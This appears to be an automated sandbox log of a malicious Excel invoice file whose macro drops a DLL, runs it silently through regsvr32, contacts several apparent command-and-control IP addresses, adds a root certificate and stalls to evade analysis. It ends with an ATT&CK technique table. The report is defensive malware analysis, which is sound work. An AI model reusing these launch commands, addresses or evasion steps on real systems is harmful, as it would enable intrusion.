Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CBF50
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002CE3F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C67C8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C83C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C7FC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002D7FC0
Source: INV3867196801-20210111675616.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV3867196801-20210111675616.xlsmOLE indicator, VBA macros: true
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360
Source: DWWIN.EXE, 00000007.00000002.2240906832.0000000003450000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.bank.expl.evad.winXLSM@9/23@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INV3867196801-20210111675616.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1296
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDB41.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: INV3867196801-20210111675616.xlsmVirustotal: Detection: 33%
Source: INV3867196801-20210111675616.xlsmReversingLabs: Detection: 32%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2360
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2360
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INV3867196801-20210111675616.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: INV3867196801-20210111675616.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV3867196801-20210111675616.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BBFA0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00187172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001A62CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0019F6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0018899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001889CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001AFB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00181D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00180E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\jczxic.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001988DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2936Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -363000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -1032000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -355000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -684000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -792000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -314000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -304000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -588000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -492000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -978000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -652000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -480000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -357000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -384000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -504000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -568000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -438000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -297000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -1002000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -640000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -880000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -660000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -417000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -552000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -882000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -524000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -286000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -672000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -624000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -307000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -560000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -312000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -540000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -566000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -249000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -536000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -692000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -477000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -247000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -526000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -444000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -243000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -372000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -346000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -324000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -525000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -660000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -141000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -524000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -325000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -259000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -254000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -686000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -265000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -137000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -244000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -279000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -244000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -658000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -248000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2332Thread sleep time: -241000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2764Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001988DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C6C50 LdrLoadDll,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BB5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001BB6D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C7A60 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\jczxic.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 2360
Source: regsvr32.exe, 00000003.00000002.2387726953.0000000000940000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388068531.0000000000B00000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2387726953.0000000000940000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388068531.0000000000B00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2387726953.0000000000940000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2388068531.0000000000B00000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002C2980 GetUserNameW,
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
